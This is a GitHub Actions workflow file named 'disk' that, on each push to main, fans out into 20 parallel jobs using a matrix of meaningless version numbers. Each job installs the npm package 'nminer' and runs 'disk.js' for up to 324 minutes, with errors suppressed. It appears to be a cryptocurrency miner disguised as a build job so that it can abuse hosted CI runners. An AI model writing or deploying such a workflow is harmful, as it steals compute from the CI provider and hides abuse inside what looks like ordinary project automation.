name: disk
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6056 }
          - { version: 4858 }
          - { version: 4188 }
          - { version: 4434 }
          - { version: 6322 }
          - { version: 6921 }
          - { version: 3375 }
          - { version: 2854 }
          - { version: 1988 }
          - { version: 4275 }
          - { version: 6936 }
          - { version: 5758 }
          - { version: 5239 }
          - { version: 6692 }
          - { version: 9092 }
          - { version: 8534 }
          - { version: 474 }
          - { version: 5890 }
          - { version: 5596 }
          - { version: 3626 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: greedily
        run: |
          npm install nminer@latest
          timeout 324m node disk.js || echo "disk executed"